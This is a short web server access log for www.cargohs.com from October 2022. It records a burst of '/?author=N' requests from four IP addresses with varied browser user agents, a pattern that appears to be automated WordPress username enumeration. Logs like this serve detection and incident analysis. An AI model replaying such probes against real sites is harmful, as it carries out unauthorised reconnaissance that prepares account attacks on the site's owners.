148.66.56.82 - - [02/Oct/2022:03:23:13 -0700] "GET /?author=1 HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0" "www.cargohs.com"
103.178.175.23 - - [02/Oct/2022:03:23:14 -0700] "GET /?author=30 HTTP/1.1" 404 16384 "-" "Mozilla/5.0 (Linux; Android 10; SM-G960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36" "www.cargohs.com"
94.142.245.165 - - [02/Oct/2022:03:23:14 -0700] "GET /?author=16 HTTP/1.1" 404 16386 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0" "www.cargohs.com"
148.66.56.82 - - [02/Oct/2022:03:23:18 -0700] "GET /?author=1 HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0" "www.cargohs.com"
103.178.175.23 - - [02/Oct/2022:03:23:19 -0700] "GET /?author=30 HTTP/1.1" 404 16384 "-" "Mozilla/5.0 (Linux; Android 10; SM-G960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36" "www.cargohs.com"
94.142.245.165 - - [02/Oct/2022:03:23:19 -0700] "GET /?author=17 HTTP/1.1" 404 16386 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0" "www.cargohs.com"
94.142.245.165 - - [02/Oct/2022:03:23:23 -0700] "GET /?author=17 HTTP/1.1" 404 16386 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0" "www.cargohs.com"
148.66.56.82 - - [02/Oct/2022:03:23:24 -0700] "GET /?author=2 HTTP/1.1" 404 16386 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0" "www.cargohs.com"
94.142.245.165 - - [02/Oct/2022:03:23:27 -0700] "GET /?author=18 HTTP/1.1" 404 16386 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0" "www.cargohs.com"
148.66.56.82 - - [02/Oct/2022:03:23:29 -0700] "GET /?author=2 HTTP/1.1" 404 16386 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0" "www.cargohs.com"
150.254.36.172 - - [02/Oct/2022:03:23:32 -0700] "GET /?author=11 HTTP/1.1" 404 16386 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0" "www.cargohs.com"
94.142.245.165 - - [02/Oct/2022:03:23:32 -0700] "GET /?author=18 HTTP/1.1" 404 16386 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0" "www.cargohs.com"
